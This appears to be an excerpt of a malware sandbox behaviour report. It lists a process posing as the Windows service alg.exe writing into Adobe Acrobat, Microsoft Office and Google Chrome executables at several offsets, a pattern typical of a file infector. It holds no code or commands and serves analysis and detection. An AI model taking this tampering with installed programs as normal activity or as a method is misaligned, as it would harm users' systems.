                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe offset: 0Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe offset: 1332736Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe offset: 285633Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe offset: 0Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe offset: 0Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe offset: 385536Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe offset: 959052Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe offset: 0Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe offset: 0Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe offset: 958976Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe offset: 182364Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe offset: 0Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe offset: 0Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe offset: 123904Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe offset: 697420Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe offset: 0Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe offset: 0Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe offset: 697344Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe offset: 66716Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe offset: 0Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe offset: 0Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe offset: 1102848Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe offset: 1676364Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe offset: 0Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe offset: 0Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe offset: 1676288Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe offset: 753617Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe offset: 0Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe offset: 0Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe offset: 2531840Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe offset: 3105356Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe offset: 0Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe offset: 0Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe offset: 3105280Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe offset: 1150992Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe offset: 0Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe offset: 0Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe offset: 459776Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe offset: 1033292Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe offset: 0Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe offset: 0Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe offset: 1033216Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe offset: 209348Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe offset: 0Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe offset: 0Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe offset: 99840Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe offset: 673356Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe offset: 0Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe offset: 0Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe offset: 673280Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe offset: 69527Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe offset: 0Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe offset: 0Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe offset: 256512Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe offset: 830028Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe offset: 0Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe offset: 0Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe offset: 829952Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe offset: 72028Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe offset: 0Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe offset: 0Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe offset: 521216Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe offset: 1094732Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe offset: 0Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe offset: 0Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe offset: 1094656Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe offset: 321696Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe offset: 0Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe offset: 0Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe offset: 210944Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe offset: 784460Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe offset: 0Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe offset: 0Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe offset: 784384Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe offset: 126840Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe offset: 0Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe offset: 0Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe offset: 13312Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe offset: 586828Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe offset: 0Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe offset: 0Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe offset: 586752Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe offset: 2828Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe offset: 0Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe offset: 0Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe offset: 4785664Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe offset: 5359180Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe offset: 0Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe offset: 0Jump to behavior
Source: C:\Windows\System32\alg.exe | File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe offset: 5359104
Source: C:\Windows\System32\alg.exe | File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe offset: 2430581
Source: C:\Windows\System32\alg.exe | File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe offset: 0
Source: C:\Windows\System32\alg.exe | File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe offset: 0
Source: C:\Windows\System32\alg.exe | File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe offset: 632832
Source: C:\Windows\System32\alg.exe | File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe offset: 1206348
Source: C:\Windows\System32\alg.exe | File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe offset: 0
Source: C:\Windows\System32\alg.exe | File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe offset: 0
Source: C:\Windows\System32\alg.exe | File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe offset: 1206272
Source: C:\Windows\System32\alg.exe | File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe offset: 206444
Source: C:\Windows\System32\alg.exe | File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe offset: 0
Source: C:\Windows\System32\alg.exe | File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe offset: 0
Source: C:\Windows\System32\alg.exe | File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe offset: 2578944
Source: C:\Windows\System32\alg.exe | File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe offset: 3152460
Source: C:\Windows\System32\alg.exe | File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe offset: 0
Source: C:\Windows\System32\alg.exe | File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe offset: 0
Source: C:\Windows\System32\alg.exe | File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe offset: 3152384
Source: C:\Windows\System32\alg.exe | File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe offset: 16859
Source: C:\Windows\System32\alg.exe | File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe offset: 0
Source: C:\Windows\System32\alg.exe | File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exe offset: 0
Source: C:\Windows\System32\alg.exe | File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exe offset: 1617920
Source: C:\Windows\System32\alg.exe | File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exe offset: 2191436
Source: C:\Windows\System32\alg.exe | File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exe offset: 0
Source: C:\Windows\System32\alg.exe | File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exe offset: 0
Source: C:\Windows\System32\alg.exe | File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exe offset: 2191360
Source: C:\Windows\System32\alg.exe | File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exe offset: 860981
Source: C:\Windows\System32\alg.exe | File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exe offset: 0
Source: C:\Windows\System32\alg.exe | File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exe offset: 0
Source: C:\Windows\System32\alg.exe | File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exe offset: 258048
Source: C:\Windows\System32\alg.exe | File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exe offset: 831564
Source: C:\Windows\System32\alg.exe | File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exe offset: 0
Source: C:\Windows\System32\alg.exe | File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exe offset: 0
Source: C:\Windows\System32\alg.exe | File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exe offset: 831488
Source: C:\Windows\System32\alg.exe | File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exe offset: 82352
Source: C:\Windows\System32\alg.exe | File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exe offset: 0
Source: C:\Windows\System32\alg.exe | File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exe offset: 0
Source: C:\Windows\System32\alg.exe | File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exe offset: 5274624
Source: C:\Windows\System32\alg.exe | File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exe offset: 5848140
Source: C:\Windows\System32\alg.exe | File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exe offset: 0
Source: C:\Windows\System32\alg.exe | File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exe offset: 0
Source: C:\Windows\System32\alg.exe | File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exe offset: 5848064
Source: C:\Windows\System32\alg.exe | File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exe offset: 3286540
Source: C:\Windows\System32\alg.exe | File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exe offset: 0
Source: C:\Windows\System32\alg.exe | File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exe offset: 0
Source: C:\Windows\System32\alg.exe | File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exe offset: 185344
Source: C:\Windows\System32\alg.exe | File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exe offset: 758860
Source: C:\Windows\System32\alg.exe | File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exe offset: 0
Source: C:\Windows\System32\alg.exe | File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exe offset: 0
Source: C:\Windows\System32\alg.exe | File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exe offset: 758784
Source: C:\Windows\System32\alg.exe | File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exe offset: 151349
Source: C:\Windows\System32\alg.exe | File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exe offset: 0
Source: C:\Windows\System32\alg.exe | File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exe offset: 0
Source: C:\Windows\System32\alg.exe | File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exe offset: 26954240
Source: C:\Windows\System32\alg.exe | File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exe offset: 27527756
Source: C:\Windows\System32\alg.exe | File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exe offset: 0
Source: C:\Windows\System32\alg.exe | File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exe offset: 0
Source: C:\Windows\System32\alg.exe | File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exe offset: 27527680
Source: C:\Windows\System32\alg.exe | File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exe offset: 11401068
Source: C:\Windows\System32\alg.exe | File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exe offset: 0
Source: C:\Windows\System32\alg.exe | File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exe offset: 0
Source: C:\Windows\System32\alg.exe | File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exe offset: 4392960
Source: C:\Windows\System32\alg.exe | File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exe offset: 4966476
Source: C:\Windows\System32\alg.exe | File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exe offset: 0
Source: C:\Windows\System32\alg.exe | File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exe offset: 0
Source: C:\Windows\System32\alg.exe | File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exe offset: 4966400
Source: C:\Windows\System32\alg.exe | File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exe offset: 2843313
Source: C:\Windows\System32\alg.exe | File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exe offset: 0
Source: C:\Windows\System32\alg.exe | File written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\chrome_pwa_launcher.exe offset: 0
Source: C:\Windows\System32\alg.exe | File written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\chrome_pwa_launcher.exe offset: 1576448
Source: C:\Windows\System32\alg.exe | File written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\chrome_pwa_launcher.exe offset: 2149964
Source: C:\Windows\System32\alg.exe | File written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\chrome_pwa_launcher.exe offset: 0
Source: C:\Windows\System32\alg.exe | File written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\chrome_pwa_launcher.exe offset: 0
Source: C:\Windows\System32\alg.exe | File written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\chrome_pwa_launcher.exe offset: 2149888
Source: C:\Windows\System32\alg.exe | File written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\chrome_pwa_launcher.exe offset: 574636
Source: C:\Windows\System32\alg.exe | File written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\chrome_pwa_launcher.exe offset: 0
Source: C:\Windows\System32\alg.exe | File written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\chrmstp.exe offset: 0
Source: C:\Windows\System32\alg.exe | File written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\chrmstp.exe offset: 4318208
Source: C:\Windows\System32\alg.exe | File written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\chrmstp.exe offset: 4891724
Source: C:\Windows\System32\alg.exe | File written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\chrmstp.exe offset: 0
Source: C:\Windows\System32\alg.exe | File written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\chrmstp.exe offset: 0
Source: C:\Windows\System32\alg.exe | File written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\chrmstp.exe offset: 4891648
Source: C:\Windows\System32\alg.exe | File written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\chrmstp.exe offset: 1700540
Source: C:\Windows\System32\alg.exe | File written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\chrmstp.exe offset: 0
Source: C:\Windows\System32\alg.exe | File written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\setup.exe offset: 0
Source: C:\Windows\System32\alg.exe | File written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\setup.exe offset: 4318208
Source: C:\Windows\System32\alg.exe | File written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\setup.exe offset: 4891724
Source: C:\Windows\System32\alg.exe | File written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\setup.exe offset: 0
Source: C:\Windows\System32\alg.exe | File written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\setup.exe offset: 0
Source: C:\Windows\System32\alg.exe | File written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\setup.exe offset: 4891648
Source: C:\Windows\System32\alg.exe | File written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\setup.exe offset: 1700540
Source: C:\Windows\System32\alg.exe | File written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\setup.exe offset: 0
Source: C:\Windows\System32\alg.exe | File written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\notification_helper.exe offset: 0
Source: C:\Windows\System32\alg.exe | File written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\notification_helper.exe offset: 1404928
Source: C:\Windows\System32\alg.exe | File written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\notification_helper.exe offset: 1978444
Source: C:\Windows\System32\alg.exe | File written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\notification_helper.exe offset: 0
Source: C:\Windows\System32\alg.exe | File written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\notification_helper.exe offset: 0
Source: C:\Windows\System32\alg.exe | File written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\notification_helper.exe offset: 1978368
Source: C:\Windows\System32\alg.exe | File written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\notification_helper.exe offset: 633260
Source: C:\Windows\System32\alg.exe | File written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\notification_helper.exe offset: 0
Source: C:\Windows\System32\alg.exe | File written: C:\Program Files\Google\Chrome\Application\chrome_proxy.exe offset: 0
Source: C:\Windows\System32\alg.exe | File written: C:\Program Files\Google\Chrome\Application\chrome_proxy.exe offset: 1199616
Source: C:\Windows\System32\alg.exe | File written: C:\Program Files\Google\Chrome\Application\chrome_proxy.exe offset: 1773132
Source: C:\Windows\System32\alg.exe | File written: C:\Program Files\Google\Chrome\Application\chrome_proxy.exe offset: 0
Source: C:\Windows\System32\alg.exe | File written: C:\Program Files\Google\Chrome\Application\chrome_proxy.exe offset: 0
Source: C:\Windows\System32\alg.exe | File written: C:\Program Files\Google\Chrome\Application\chrome_proxy.exe offset: 1773056
Source: C:\Windows\System32\alg.exe | File written: C:\Program Files\Google\Chrome\Application\chrome_proxy.exe offset: 513116
